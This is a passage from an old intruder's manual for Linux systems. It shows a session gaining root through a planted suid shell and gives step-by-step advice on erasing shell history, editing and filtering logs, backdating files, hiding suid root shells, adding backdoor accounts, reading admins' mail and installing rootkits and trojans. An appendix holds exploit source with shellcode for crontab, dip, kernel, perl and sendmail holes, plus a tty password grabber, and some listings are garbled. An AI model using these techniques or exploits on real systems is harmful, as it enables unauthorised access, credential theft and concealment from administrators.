-rwxr-xr-x   1 root     root         7689 Nov  2  1995 mkdir
-rwxr-xr-x   1 root     root         7001 Nov  2  1995 mknod
-rwxr-xr-x   1 root     root        20272 Nov  1  1995 more
-rwsr-xr-x   1 root     root        26192 Nov  1  1995 mount
-rwxr-xr-x   1 root     root         8381 Oct 31  1995 mt
-rwxr-xr-x   1 root     root        12753 Nov  2  1995 mv

******----> Now it looks like it belongs ... lets see if
            it gives us root, exit our current root shell..

bash# exit

[jnsmith@ns .term]$ cd /bin
[jnsmith@ns /bin]$ whoami
jnsmith
[jnsmith@ns /bin]$ findhost
[jnsmith@ns /bin]# whoami
root

[jnsmith@ns /bin]# cd

******----> cd {enter} takes us back to our home dir

[jnsmith@ns jnsmith]# ls
mail
[jnsmith@ns jnsmith]# echo + +>test
[jnsmith@ns jnsmith]# ls -l
total 2
drwx------   2 jnsmith   jnsmith       1024 Jan 11 22:47 mail
-rw-rw-r--   1 root      root            4 Jan 29 06:11 test

******----> See now we are uid=0 gid=0

[jnsmith@ns jnsmith]# rm test

******----> clean as we go .....

[jnsmith@ns jnsmith]# w
6:12am  up 18 days,  8:58,  0 users,  load average: 0.07, 0.02, 0.00
User     tty       login@  idle   JCPU   PCPU  what

******----> Just making sure we are still alone ....

[jnsmith@ns jnsmith]# ls -al /tmp/.p*
total 15692
-rw-rw-r--   1 root     root          157 Jan 29 06:10 .pinttemp.000

******----> were getting passwords already ;)

[jnsmith@ns jnsmith]# ls -al
total 32
drwxrwx---   5 jnsmith   jnsmith   1024 Jan 29 06:11 .
drwxr-xr-x  33 root      users     1024 Jan 22 16:53 ..
-rw-r-----   1 jnsmith   jnsmith   1126 Aug 23  1995 .Xdefaults
lrwxrwxrwx   1 jnsmith   jnsmith      9 Jan  1 21:40 .bash_history -> /dev/null
-rw-r--r--   1 root      jnsmith     24 Jan  1 03:12 .bash_logout
-rw-r--r--   1 root      jnsmith    220 Jan  1 03:12 .bash_profile
-rw-r--r--   1 root      jnsmith    124 Jan  1 03:12 .bashrc
-rw-rw-r--   1 root      jnsmith   5433 Jan 11 22:47 .pinerc
drwxrwxr-x   2 jnsmith   jnsmith   1024 Jan 29 06:22 .term
drwxr-x---   2 jnsmith   jnsmith   1024 Feb 17  1996 .xfm
drwx------   2 jnsmith   jnsmith   1024 Jan 11 22:47 mail
[jnsmith@ns jnsmith]#

******----> Make sure you place this sys link .bash_history to /dev/null so
            you do not leave a history behind...

This is the command to do it, but make sure you delete the old .bash_history
if it is there.

ln -s /dev/null .bash_history

Ok logout ...

Ok, there is another way!!!!!!

If you can remember and make it a practice that you NEVER forget, get used to
this.... EVERY TIME you login to an account type: unset HISTFILE

This will tell the system to delete your history file when you logoff the
system...   USE THIS!  Get into the practice!  DON'T FORGET!

-----------
Section 6B
messages and syslog
-----------

In the log directory you will find a file called 'messages' each system is
different as far as what is logged to what files or what file name.  Make
sure to check in the /etc/syslog.conf file for additional logging to
remote machines.  If this is being done you will see something like this:

*.*                                 @somehostname.xxx

Or just to check and see where the log files are going you can view this file
/etc/syslog.conf.

Here is a sample...

bash# more syslog.conf
# /etc/syslog.conf
# For info about the format of this file, see "man syslog.conf" (the BSD man
# page), and /usr/doc/sysklogd/README.linux.
#
# NOTE: YOU HAVE TO USE TABS HERE - NOT SPACES.
# I don't know why.
#

*.=info;*.=notice                               /var/adm/messages
*.=debug                                        /var/adm/debug
*.warn                                          /var/adm/syslog
*.warn                                          /root/.../syslog
*.=crit;kern.none                               /var/adm/critical
kern.info;kern.!err                             /var/adm/kernel-info
mail.*;mail.!=info                              /root/.../mail
mail,news.=info                                 /root/.../info
mail.*;mail.!=info                              /var/adm/mail
mail,news.=info                                 /var/adm/info
*.alert                                         root,bob
*.=info;*.=notice                               @quality.com
*.=debug                                        @quality.com
*.warn                                          @quality.com
*.=crit;kern.none                               @quality.com
kern.info;kern.!err                             @quality.com
mail.*;mail.!=info                              @quality.com
mail,news.=info                                 @quality.com

Here some of the logs are going into a hidden directory in the /root directory
and a copy of every alert and warning are being also sent to the logs at
quality.com.  wtmp, utmp and lastlog are still local, so you can still be
ok, just make sure not to use 'su' on a system like this.  Also notice above
that alert messages are being mailed to root and bob on this system.

Also take note that syslog, mail, and, info are being sent to the /var/adm
directory to fool you into thinking all of the logs are in /var/adm!  If you
edit /var/adm the admin can run a diff on the backup files in the /root dir.

Ok, so you go to the /var/adm or /var/log directory and:

grep yourhost * |more
grep your ip * |more

you see that some files are logging your connection, mark down what files
are logging you and edit the /etc/syslog.conf file.  You will from trial
and error in most cases make it skip the logging process of your domain.

BUT, make sure to do a few things.  After you edit the file restart the
syslogd.  You can do this by doing a ps -x

$root> ps -x

39  ?  S    1:29 /usr/sbin/syslogd

find the syslogd and notice the process id here is 39, so you do:

kill -HUP 39

This will restart the process and put your changes into effect.

The other thing is to make sure to do a ls -l /etc/syslog.conf BEFORE you
edit it and touch the file date back to the original date and time after
you edit it.  This way if they notice the logging looks different, they
will check the file date and think it must be something else.  Most admins
would not know how to setup this file in the first place, so you in some
(or most) cases ok to edit it.

Here is another file to look at.

/etc/login.defs

# Enable "syslog" logging of su activity - in addition to sulog file logging
# SYSLOG_SG_ENAB does the same for newgrp and sg.
#
SYSLOG_SU_ENAB          yes
SYSLOG_SG_ENAB          yes
#
# If defined, all su activity is logged to this file
#
SULOG_FILE      /home/users/bob/.list

Notice here that there is an su log file in a hidden file in one of
the admin's directories.

-----------
Section 6C
xferlog
-----------

The xferlog can be edited with your favorite text editor, pico, joe, vi, etc..
you can then search for your transfers and delete the lines and save the file.
You will need to do this after transferring any files.

You will also want to grep the files in the /usr/local/etc/httpd/log directory
if you have used the web or phf on the system to remove your presence
from there.

grep (username or hostname) * |more

If you need to find the logs for httpd you can do a find -name httpd.conf
-print and view the config file you see where the httpd logs are going.

There might be different ftp logs for transfers in some ftp or virtual ftp
directory some where.  View the files in the /etc/ftp* to find what the ftp
setup is on the box.

Here I have shown you to edit log files using pico, joe, or other editors.

There is another way... Sometimes log files might be real large and the editor just might
not cut it ;)  Here is what to do...

You have a messages file 20 meg ... wow!

If you want to get the lines that have fudge.candy.com out of this file you
might want to do this:

grep -v fudge.candy >messages.2
rm messages
mv messages2 messages

then kill -HUP 

-v means grep everything that does not match the line, so you are greping
the file -what you do not want to a new file name messages.2.  Check the
file size after the grep to make sure no errors were made and replace the
old one with the new one and restart syslogd.

This can also be used with other logs like xferlog, syslog, etc...

Here is a perl script that will do it for you from command line.

------------------- start of riptext.pl
#!/usr/bin/perl
#
# RipText - Takes regular expression and filename argument from @ARGV. Any 
#           lines MATCHING regular expression will *not* be printed to 
#           STDOUT. 
# 
#

die("\nUsage: riptext [regexp] {filename}\n\n") if (!defined($ARGV[0]));
($regexp, $filename) = @ARGV[0,1];

# Read in contents of file.
$/ = undef;
$contents="";
if (!defined($filename)) {
  # Use STDIN.
  $contents = scalar ;
} else {
  # Use FILE.
  open(FILE, "<$filename") || die("-RipText- Cannot open $filename: $!\n");
  $contents = scalar ;
  close(FILE);
}

@contents = split(/\n/, $contents);

# Strip file of matching lines.
open(FILE, ">$filename") || die("-RipText- Cannot write $filename: $!\n");
foreach (@contents) {
  print FILE "$_\n" unless (/$regexp/i);
}
close(FILE);

0;

------------------------ end of riptext.pl

Remember to restart syslogd after you edit files, true you will not see
the stuff, and it will be gone to your eyes, but if you do not restart the
process, the data is still in memory and can be retrieved until you restart
the process!

Also look for notes in the syslog that the syslogd process was restarted at
such and such a time.

---------------
Section 6D
The cron table
---------------

Make sure to look at admin's and root cron files, here in this system we find
a root cron file in: /var/spool/cron/crontabs
bash# ls -l
total 1
-rw-------   1 root     root          851 Jan 26 14:14 root

bash$ more root
# This updates the database for 'locate' every day:
40 07 * * *       updatedb 1> /dev/null 2> /dev/null
40 */12 * * *       /sbin/checkfs

there is a file running here in /sbin called checkfs.

bash$ cd /sbin
bash$ /sbin # more checkfs
#!/bin/bash

if [ ! -f /etc/default/fs/.check ]; then
  echo WARNING!! Filecheck default file cannot be found. Please regenerate.
    exit
    fi

md5sum /usr/bin/* > /tmp/filecheck 2>/dev/null
md5sum /usr/sbin/* >> /tmp/filecheck 2>/dev/null
md5sum /sbin/* >> /tmp/filecheck 2>/dev/null
md5sum /bin/* >> /tmp/filecheck 2>/dev/null
md5sum /usr/local/bin/* >> /tmp/filecheck 2>/dev/null
md5sum /usr/local/sbin/* >> /tmp/filecheck 2>/dev/null
md5sum /lib/* >> /tmp/filecheck 2>/dev/null
md5sum /usr/lib/* >> /tmp/filecheck 2>/dev/null
diff /tmp/filecheck /etc/default/fs/.check > /tmp/filecheck2 2>&1

if [ -s /tmp/filecheck2 ]; then
  mail -s FSCheck bin < /tmp/filecheck2
  fi

rm /tmp/filecheck /tmp/filecheck2 2>/dev/null

md5 is a checksum file, if you change or add a binary file to any of the
above directories the information of the changes will be mailed to the
admin.

------------------------------
Chapter 7
Keeping access to the machine
------------------------------

There are many ways to keep access to the machine, you will loose
access to many as you as you are learning, but I hope with this manual
and some experience you will become a stable hacker.

Section 7A
Tricks of the trade

Here are some 'tricks' of the trade that will help you keep access
to the machine.  After a system admin has found you out, they will be watching
for you and going through everything on the system.  They will go as far as
recompiling binary files, changing everyone's passwords, denying your host you
came in from to the machine, going through the passwd or shadow file, looking
for SUID files, etc....

When you see that you have been found out, do not try to get access to the
system again.  I have seen others right after being cought, try everyone of
their trojans, other accounts, and other backdoor's they placed for continued
access.  Well think about it, they are watching for you ... you are showing
them every in that you have to the system, and every exploitable file you
are making known to them.

NO!  WAIT!  Give it a few months, they will think everything is ok, and they
will relax and you can come in with one of the backdoor's they missed, and you
can do your thing on the logs for all of the attempts you made on the system
to get back in.

Ok here are some tricks of the trade.

History Files:
--------------
Always put your .bash_history to /dev/null, if you don't make sure you at least
edit it.  Remember the .bash_history will always have your last commands until
the logoff.  So if you edit it, it will show that you are editing it. You might
try changing your shell and editing it there, but this all seems like a pain,
just set it to /dev/null

1. Delete the file in the user directory .bash_history if it there.
2. Type this command in the home directory: ln -s /dev/null .bash_history

Nested directory:
-----------------
Always find a directory on the system to hide your files.  There are a few good
ones that most users never look into.

In the users home directory look for .term, all you will find in this directory
is an executable file called termrc.  Admin's and users alike are used to seeing this
hidden directory, and never EVER go into it.  if they did what do you think
they would say to an executable file being in there called termrc?  You are right!
Nothing .... it belongs there and it is what they expect to see there.

So lets say we make termrc a little bigger, and add suid perm's ... are you
getting the idea???? I hope you guessed it... go to the /bin directory and
type cp bash (or sh whatever is there) ~username/.term/termrc
then type : chown root ~username/.term/termrc
          : chgrp root ~username/.term/termrc
          : chmod +s ~username/.term/termrc

Now you have a nested file that can get you root on the system any time that
will not be easy for the admin to find.  If you want to get fancy, touch
the file date to make it look like an older file.

Another directory off the user accounts expected to be there and unused would
be .elm, .term or Mail, or try making a directory called '...' this is harder
to notice seeing the first directories that show are . and .., so it can go
un-noticed easy.  This is how it would look if they did a long ls:

1024 Jan 29 21:03 .
1024 Dec 28 00:12 ..
1024 Jan 29 21:03 ...
 509 Mar 02  1996 .bash_history
  22 Feb 20  1996 .forward
 164 May 18  1996 .kermrc
  34 Jun 06  1993 .less
 114 Nov 23  1993 .lessrc
1024 May 18  1996 .term
1024 May 19  1996 public_html

see how it seems to just fit into place?

but if it was just a ls -l, this is what would be seen:

1024 May 19  1996 public_html

Remember you can always look for some REAL LONG file path that you are sure
that no one would ever even want to enter into, and use this for your nested
directory.  You can even make your own directory there like:(...) ;)


Making new commands
--------------------
After you check the cron to see if there is md5 being used there, you might
want to either copy one of your exploits to another filename in the system,
or maybe just overwrite a command that you know would never be used.  If
you copy to a new file name make sure you touch the file date.  This is not
so long lasting because sooner or later they will patch the exploit and your
new file you made will not work anymore.

It is better to use a shell for the new filename, and then make it suid.

Adding or changing passwd entry's
---------------------------------
Another backdoor that you can use is to add a new user to the passwd file.
This needs to be done with caution making it look like it belongs there.
Never use your passwd addition, never login, it is just for a backup in case
you loose access.

There are different thoughts here: you do not have to make it a root account
that could cause notice to it right away.  You know you can have root any time
you want it.  Lets practice ...

We want to make our account look like it belongs, so lets keep to the top of
the file.

root:fVi3YqWnkd4rY:0:0:root:/root:/bin/bash
sysop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash

Looking at the above passwd file leaves us a few options so i will just list
them here.

1. Look at the user line for operator, ftp, and postmaster.  All of these
accounts have shells with no passwd's set yet.  From your shell just type:

passwd postmaster

Set the account with no passwd by just pressing enter.  Now you will be able
to log into this account any time without a password and the file will still
look right to the admin.

2. add this line to the passwd file:

syst::13:12:system:/var/spool:/bin/bash

Place it in the file where it seems to flow.  You can leave the :: for the
passwd or set the passwd to what you want by typing: passwd syst from the
root shell.  Set the group and id above to what you like.


3. Look at the line above for sync

sync:*:5:0:sync:/sbin:/bin/sync

Change this to :

sync:*:5:0:sync:/sbin:/bin/bash and then run  and leave the passwd
blank.  (or set a passwd don't matter) On this account we are even gid=0 rin

Installing games
----------------

You could always install exploitable doom or abuse into the system if they
already have games installed.  I will include the root exploits for these
games below in the appendix.

Always be watching
------------------

Always know who the admin's are on a system, you can find them by looking at
the passwd file to see home directories, placement of the uid, group access
accounts, and ALWAYS read all of the bash_history files in the user directories
to see who is using admin commands.  You will also learn allot of new commands
from reading history files, but you want to know who is who on the system.
Get to know your system well. Look for users using su:  View the log files
to see who is using admin commands.

Always be watching the system, keep track of who is on while you are.  Watch
the admin's history to see what commands they are using, ttysnoops? too many
ps commands?  finger commands after ps or w or who commands will show they
are watching what other users on the system are doing.  Watch your admin's
and get to know how aware they are of users on their system.

Reading system mail

Rember first NEVER to use system mail programs!  They will be able to tell you
are reading their mail.  I use a combo of a few things.  Here you go...

1. cd /var/spool/mail

This will put you into the directory that holds all of the unread mail, or
waiting mail.  Now you can do things like:

grep -i security * |more
grep -i hack * |more
grep -i intruder * |more
grep -i passwd * |more
grep -i password * |more

Then if needed pico username, and ctrl w to search for your maeesge.  You
can also delete messages if you see some other admin is telling them that
your user name is hacking their machine from their domain.

For a mail reader that will allow toy to read mail without updating pointers
try:

http://obsidian.cse.fau.edu/~fc
has a util on it that can cat /var/spool/mail files without changing the
last read dates.. ie they have no idea that you have read their mail.

Also remember you can find other system mail in user's directories.  Make sure
to look in the /root directory.  Look for /root/mail or username/mail or other
directories or filders that contain older mail.

Happy Hunting ...

--------------------------------
Section 7B
Root and Demon kits and trojans
--------------------------------

Root kits are C source for ps, login, netstat and sometimes some other
programs that have been hacked for you.  With these kits you will be
able to replace the login files on the hacked box so that you can login
without an account on the machine.

You will also be able to patch ps so that you will not show up when an
admin uses the ps command.  With the ps patch you can also have it not show
processes that have certain file names such as any file that starts with
'sniff'.

Demon kits will have hacked programs for identd, login demon, ping, su,
telnetd, and, socket.

Trojans will be any file that you can use that will allow you to exploit
the system in some way.  An su trojan placed in the admin's directory would
run the trojan su first after you change the export path for him ;) and report
back that he typed the wrong passwd and delete the trojan file, but saving
the password he typed to the /tmp directory.

A login trojan would save all login passwords to a file on the machine
for you.  I think you get the idea ;)

Demon and Linux root kits have been uuencoded and attached to the end of
appendix VI

******************************************
* Appendix I - Things to do after access *
******************************************


I think in this paper we have covered most of the things  you can do after
access, so I will make this in the style of a checklist from a to z.

a. learn who the admin's are on the system
b. watch the system with ps -auxe and ps -auxef (if it works) and pstree to
   try and keep track of what others are doing
c. read all of the bash history files or any history files you can find on the
   machine to learn more yourself, and to learn about the users
d. make as many backdoor's into the system as you can that you are sure will
   not be found out
e. keep the access to yourself, don't give out users passwords on the machine
   you get root on.
f. always clean your utmp and wtmp right away when you login
g. always clean your mess as you go along, this includes your xferlog and
   messages
h. if you have root access make sure to read /etc/syslog.conf and
   /etc/login.defs to see how the system is logging
i. before changing binary files look at the root cron to see what they are
   running.
j. look for md5 on the system
k. look for separate ftp logs
l. make sure to clean the www logs if you ever send phf commands to the server
m. make an suid root shell and place it somewhere on the system
n. do only what you are sure of, don't do everything in this hacking manual all
   at once or you are asking to get cought
o. only use nested directories, do not put files into user directories where
   all they need to do is type ls to see them
p. don't add user accounts and think they will not notice you.
q. don't use pine or other mail programs to read users mail. if you want to
   read mail go to the mail dir and read it from unix, new mail you will find
   in /var/spool/mail read it there.
r. don't change the system so that other programs they have running will not
   work any more, they will be on you like fly's on shit
s. don't delete files on the system unless you put them there
t. do not modify their web pages, like i was here ... you are not a hacker you
   are a little kid wanting attention
u. do not change any passwords on the system (unless you are doing it for
   access and have backed up the passwd file and replace it right after you
   login
v. do not use any root account machines for irc access, or to load a bot on
w. if your root account changes or you create files that are owned by the
   wrong group, be sure to chown the files
x. do not use .rhosts if there is already one there that is being used
y. never telnet or ftp to your account from the hacked box
z. don't fuck up their machine! only do what you know how to do.

****************************************************
* Appendix II - Hacking / Security WWW / ftp sites *
****************************************************

IRC QuantumG #virus
Quantum's Linux Page
http://obsidian.me.fau.edu/~quantum
Nice site for a bit of info and unix exploits!

CyberToast's Files section
Here you will find a nice selection of hacking, crackers, hex editors, viruses,
cracks, phreaking, war dialers, scanners, and, misc files.
www.ilf.net/~toast/files

Reptiles Realm
A nice site for many linux exploits
www.users.interport.net/~reptile/linux

FTP site loaded with all kinds of IRC, BOTS, UNIX EXPLOITS, VIRUSES and ZINES!
http://ftp.giga.or.at/pub/hacker

Linux Security Digest
Lot's to look at here
http://king.dom.de/~un/linux-security

Linux Security Alert
http://bach.cis.temple.edu/linux/linux-security/Linux-Alerts

The Linux Security Home Page
http://www.ecst.csuchico.edu/~jtmurphy

These are good sites just to get you started, there are many links on these.
Just make sure to browse in your favorite engine and search for words like:
hack, linux, unix, crack ect....

*********************************************************
* Appendix III - More exploits for root or other access *
*********************************************************


..........................................................................
.                                                                        .
. 1. vixie crontab buffer overflow for RedHat Linux                      .
..........................................................................

If crontab is suid it is more then likely exploitable.


-----------cut here

/* vixie crontab buffer overflow for RedHat Linux
 *
 * I don't think too many people know that redhat uses vixie crontab.
 * I didn't find this, just exploited it.
 *
 *
 * Dave G. 
 * 10/13/96
 *
 */
 
#include 
#include 
#include 
#include 
#include 
 
#define DEFAULT_OFFSET          -1240
#define BUFFER_SIZE             100     /* MAX_TEMPSTR is 100 */
#define HAPPY_FILE              "./Window"
 
long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}
 
main(int argc, char **argv)
{
   int fd;
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
  u_char execshell[] = 
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
 
 
  
/*
 * The sscanf line reads for 'name' as %[^ =].  Neither a space, nor
 * a '=' character appears below
 */
 
   
   int i;
   int ofs = DEFAULT_OFFSET;
 
   /* if we have a argument, use it as offset, else use default */
   if(argc == 2)
      ofs = atoi(argv[1]);   
   else if (argc > 2) {
      fprintf(stderr, "egg [offset]\n");
      exit(-1);
   }
   /* print the offset in use */
   printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
   
   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   /* fill start of buffer with nops */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   /* stick asm code into the buffer */
   for(i=0;i < strlen(execshell);i++) 
      *(ptr++) = execshell[i];
   
   addr_ptr = (long *)ptr;
   for(i=0;i < (878/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr++ = '=';
   *ptr++ = 'X';
   *ptr++ = '\n';
   *ptr = 0;
   printf("Writing to %s\n", HAPPY_FILE);
 
/*
 * The sleep is required because as soon as crontab opens the tmp file it
 * stat's and saves it.  After the EDITOR program exists it stats again
 * and if they are equal then it assumes changes weren't made and exits.
 */
   fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
   write (fd, buff, strlen(buff));
 
   close(fd);
 
   execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); 
   /* Successful completion */
   exit(0);
}
----------- cut here

..........................................................................
.                                                                        .
.  2. Root dip exploit                                                   .
.                                                                        .
..........................................................................

in /sbin you will find a symbolic link called dip to a suid root binary.
Chances are, if this file is suid, it's sploitable.

-------- cut here

#include 
#include 
#include 
#include 
#include 
#define PATH_DIP "/sbin/dip"
u_char shell[] = 
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hs";
u_long esp() { __asm__("movl %esp, %eax"); }
main()
{
  u_char buf[1024];
  u_long addr;
  int i, f;

  strcpy(buf, "chatkey ");
  addr = esp() - 192;
  for (i=8; i<128+16; i+=4)
    *((u_long *) (buf+i)) = addr;
  for (i=128+16; i<512; i++)
    buf[i] = 0x90;
  for (i=0; i
#include 
#include 
#include 
#ifdef NEWERKERNEL
#include 
#endif
#define __KERNEL__
#include 
#include 

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)


#define KERNEL_BASE 0xc0000000
/* ------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{
  unsigned char res;
  asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
       : "=a" (res)
       : "r" (seg), "r" (ofs));
  return res;
}
/* ------------------------------------------------------------------------ */
static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{
  asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
       : /* No results.  */
       : "r" (seg), "r" (ofs), "r" (b));
}
/* ------------------------------------------------------------------------ */
void
memgetseg (void *dst, int seg, const void *src, int size)
{
  while (size-- > 0)
    *(char *)dst++ = __farpeek (seg, (unsigned)(src++));
}
/* ------------------------------------------------------------------------ */
void
memputseg (int seg, void *dst, const void *src, int size)
{
  while (size-- > 0)
    __farpoke (seg, (unsigned)(dst++), *(char *)src++);
}
/* ------------------------------------------------------------------------ */
int
main ()
{
  int stat, i,j,k;
  struct modify_ldt_ldt_s ldt_entry;
  FILE *syms;
  char line[100];
  struct task_struct **task, *taskptr, thistask;
  struct kernel_sym blah[4096];

  printf ("Bogusity checker for modify_ldt system call.\n");

  printf ("Testing for page-size limit bug...\n");
  ldt_entry.entry_number = 0;
  ldt_entry.base_addr = 0xbfffffff;
  ldt_entry.limit = 0;
  ldt_entry.seg_32bit = 1;
  ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
  ldt_entry.read_exec_only = 0;
  ldt_entry.limit_in_pages = 1;
  ldt_entry.seg_not_present = 0;
  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
  if (stat)
    /* Continue after reporting error.  */
    printf ("This bug has been fixed in your kernel.\n");
  else
    {
      printf ("Shit happens: ");
      printf ("0xc0000000 - 0xc0000ffe is accessible.\n");
    }

  printf ("Testing for expand-down limit bug...\n");
  ldt_entry.base_addr = 0x00000000;
  ldt_entry.limit = 1;
  ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
  ldt_entry.limit_in_pages = 0;
  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
  if (stat)
    {
      printf ("This bug has been fixed in your kernel.\n");
      return 1;
    }
  else
    {
      printf ("Shit happens: ");
      printf ("0x00000000 - 0xfffffffd is accessible.\n");
    }

  i = get_kernel_syms(blah);
  k = i+10;
  for (j=0; j = 0;                                     #set effective user id
$ENV{'PATH'} = '/bin:/usr/bin';             #secure the session
$ENV{'IFS'} = '' if $ENV{'IFS'} ne '';
$execpath = "/bin/sh";                      #sameol sameol
$execpath =~ /(.*)/;                        #untaint the variable
$boom = $1;                                 #$boom untainted
system $boom;                               #run EUID=0 shell

----------------cut here

..........................................................................
.                                                                        .
. 5. Abuse Sendmail 8.6.9                                                .
.                                                                        .
..........................................................................

-----------cut here
/* smh.c - atreus - Michael R. Widner (2/27/95)
 *  
 * a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
 * hole.  It's really just a matter of passing newlines in arguments to
 * sendmail and getting the stuff into the queue files.  If we run this
 * locally with -odq we are guaranteed that it will be queue, rather than
 * processed immediately.
 * usage: smh [ username [/path/to/sendmail]]
 * It's worth noting that this is generally only good for getting bin.
 * sendmail still wants to process the sendmail.cf file, which contains
 * Ou1 and Og1 most of the time, limiting you to bin access.  Is there
 * a way around this?
 * cc -o smh smh.c should do the trick.  This just creates a bin owned
 * mode 6777 copy of /bin/sh in /tmp called /tmp/newsh.  Note that on some
 * systems this is pretty much worthless, but you're smart enough to know
 * which systems those are.  Aren't you?
bash$ ./smh root /usr/lib/sendmail
bash$ /usr/lib/sendmail -q
*/
#include 
#include    
#include    

/* Take Your Pick */
#define EVIL_COMMAND1 "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii "
#define EVIL_COMMAND2 "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh  >/tmp/.inetd.conf\">\nR<\"|/usr/sbin/inetd /tmp/.inetd.conf\">\n$rasc
ii "

main(argc, argv)
int argc;
char **argv;
{                          
      execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p", EVIL_COMMAND1,
      argv[1] ? argv[1] : "atreus",0);
}

----------- cut here
..........................................................................
.                                                                        .
. 6. ttysurf - grab someone's tty                                         .
..........................................................................

------------cut here
#include 
#include 
#include 
#include 
#include 
#include 

#define DEBUG 1         /* Enable additional debugging info (needed!) */
#define USLEEP          /* Define this if your UNIX supports usleep() */

#ifdef ULTRIX
#define TCGETS TCGETP   /* Get termios structure */
#define TCSETS TCSANOW  /* Set termios structure */
#endif


handler(signal)
           int signal;             /* signalnumber */
{                       /* do nothing, ignore the signal */
        if(DEBUG) printf("Ignoring signal %d\n",signal);
}

int readandpush(f,string)
FILE *f;
char *string;
{
        char *cp,*result;
        int e;
        struct termios termios;

        result=fgets(string,20,f);    /* Read a line into string */
        if (result==NULL)
        {       perror("fgets()");
                return(1);
        }
        if (DEBUG)
        {       printf("String: %s\n",string);
                fflush(stdout);
        }

        ioctl(0,TCGETS,&termios);       /* These 3 lines turn off input echo */
 /*        echo = (termios.c_lflag & ECHO);      */
        termios.c_lflag=((termios.c_lflag | ECHO) - ECHO);
        ioctl(0,TCSETS,&termios);

        for (cp=string;*cp;cp++)        /* Push it back as input */
        {       e=ioctl(0,TIOCSTI,cp);
                if(e<0)
                {       perror("ioctl()");
                        return(1);
                }
        }
        return(0);
}

main(argc,argv)
int argc;
char *argv[];
{
        /* variables */
        int err;
        FILE *f;
        char *term      = "12345678901234567890";
        char *login     = "12345678901234567890";
        char *password  = "12345678901234567890";
        if (argc < 2)
        {       printf("Usage: %s /dev/ttyp?\nDon't forget to redirect the output to a file !\n",argv[0]);
                printf("Enter ttyname: ");
                gets(term);
        }
        else term=argv[argc-1];

        signal(SIGQUIT,handler);
        signal(SIGINT,handler);
        signal(SIGTERM,handler);
        signal(SIGHUP,handler);
        signal(SIGTTOU,handler);

        close(0);               /* close stdin */
#ifdef ULTRIX
        if(setpgrp(0,100)==-1)
                perror("setpgrp:");     /* Hopefully this works */
#else
        if(setsid()==-1)
                perror("setsid:"); /* Disconnect from our controlling TTY and
                                   start a new session as sessionleader */
#endif
        f=fopen(term,"r");      /* Open tty as a stream, this guarantees
                                           getting file descriptor 0 */
        if (f==NULL)
        {       printf("Error opening %s with fopen()\n",term);
                exit(2);
        }
        if (DEBUG) system("ps -xu>>/dev/null &");
        fclose(f);              /* Close the TTY again */
        f=fopen("/dev/tty","r");        /* We can now use /dev/tty instead */
        if (f==NULL)
        {       printf("Error opening /dev/tty with fopen()\n",term);
                exit(2);
        }

        if(readandpush(f,login)==0)
        {
#ifdef USLEEP
                usleep(20000);  /* This gives login(1) a chance to read the
                                   string, or the second call would read the
                                   input that the first call pushed back ! /*
#else
                for(i=0;i<1000;i++)
                        err=err+(i*i)
                           /* error        /* Alternatives not yet implemented */
#endif
                readandpush(f,password);
                printf("Result: First: %s Second: %s\n",login,password);
        }

        fflush(stdout);
        sleep(30);      /* Waste some time, to prevent that we send a SIGHUP
                           to login(1), which would kill the user. Instead,
                           wait a while. We then send SIGHUP to the shell of
                           the user, which will ignore it. */
        fclose(f);
}
--------------cut here

..........................................................................
.                                                                        .
. 7. shadow.c  - Get shadow passwd files                                 .
